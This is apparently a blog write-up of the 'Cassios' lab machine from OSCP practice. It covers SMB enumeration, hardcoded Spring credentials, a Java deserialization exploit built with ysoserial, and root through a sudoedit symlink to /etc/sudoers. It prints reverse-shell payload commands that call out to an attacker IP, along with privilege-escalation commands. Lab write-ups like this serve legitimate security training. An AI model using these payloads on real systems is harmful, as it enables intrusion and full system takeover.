[OSCP Practice Series 52] Proving Grounds — Cassios

Ardian Danny
4 min read · Feb 10, 2024


Machine Type: Linux

Initial

Nmap discovered ports 22, 80, 139, 445, and 8080 open. Let’s check SMB first.

There’s a share called Samantha Konstan.

We can access it. Let’s download everything.

It looks like the source code of a Java Spring web application, probably one of the web applications exposed on this box. Let’s check port 80.

It seems to be a static web page. Nothing useful. I will run Gobuster on it while checking the other web services. Let’s check port 8080.

Recycler Management System. This matches the source code we pulled from SMB. Let’s analyze the source code now.

There’s a note from the developer.

We know that there’s a user named samantha.

The .ser file holds all the last data saved from the process, it can
be read from the upper management dashboard app.

We have the recycler.ser file, but it’s empty. I will run Gobuster in the background just in case.

There are default PostgreSQL credentials. Meanwhile, our Gobuster on port 80 found something interesting.

That’s a very uncommon directory.

OKAY, recycler is the name of the other site.

These seem to be the same files that we got from SMB.

THERE ARE HARDCODED CREDS THIS TIME

// Spring Security config: an in-memory user with a hardcoded password.
// Anyone who can read the source (the SMB share, the web directory) gets a valid login.
@Override
public UserDetailsService userDetailsService() {
    UserDetails user =
        User.withDefaultPasswordEncoder()
            .username("recycler")
            .password("DoNotMessWithTheRecycler123")
            .roles("USER")
            .build();

    return new InMemoryUserDetailsManager(user);
}

Let’s try to login.

Foothold

We are in. Since this is a Java app and we have the code, I feel that there may be a deserialization attack possible here. On the site, we can access three paths which are /check, /save, and /dashboard. Let’s check the code again.

Ahh, now this makes sense. The SMB share appears to expose the contents of /home/samantha/backups/, and we can write to it. The application deserializes recycler.ser from that directory, so the file is our payload injection point. You can learn about Java deserialization attacks from this awesome Snyk blog.

We just need to create our payload now, we can use Ysoserial for this (https://book.hacktricks.xyz/pentesting-web/deserialization).


java -jar /opt/ysoserial-all.jar CommonsCollections4 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.238 445 >/tmp/f" > recycler.ser

Hm.. it doesn’t work. The gadget chain ends in Runtime.exec(), which does not invoke a shell: the string is split on whitespace and the pipes, redirects and semicolons are handed to rm as literal arguments. Let’s try the one provided on HackTricks, which wraps the real command in base64 and uses bash brace expansion so the argument contains no shell metacharacters or extra spaces.

java -jar /opt/ysoserial-all.jar CommonsCollections4 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yMzgvNDQ1IDA+JjE=}|{base64,-d}|{bash,-i}" > recycler.ser

Nice, we are in.

Getting Root

Immediately, sudo -l shows that we can run sudoedit as root on recycler.ser inside a wildcarded directory under /home/samantha.

sudoedit is the edit mode of sudo: it copies the target file to a temporary location, runs your editor on the copy as the unprivileged user, and writes the result back as the target user (root here). Unlike sudo vim /etc/foo, the editor itself never runs as root.

What can we do to escalate our privilege by editing a file? Of course, add an /etc/passwd entry or edit /etc/sudoers. I will do it with /etc/sudoers because it’s easier. The rule covers /home/samantha/*/recycler.ser, so we create a directory matching the wildcard, place a symlink named recycler.ser pointing to /etc/sudoers inside it, and add an entry such as: samantha ALL=(ALL) NOPASSWD: ALL. Whether sudoedit follows that symlink depends on the sudoers sudoedit_follow flag (off by default since sudo 1.8.15) or a FOLLOW tag on the rule, so check the exact rule in sudo -l first.

ln -s /etc/sudoers /home/samantha/asd/recycler.ser
sudoedit -u root /home/samantha/asd/recycler.ser

Then just add the malicious sudoers entry.

Nice, we are root.

local.txt: 0e26a302fac03eb9d0423281871ef63a
proof.txt: d63708dc8d251769a617ad9c43fc9426

Learned

  • Symlinks and sudoedit are awesome.
  • Always run a directory brute force on all sites.


Ardian Danny

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover. My first account got disabled by Medium, but it won’t stop me from sharing the things I love.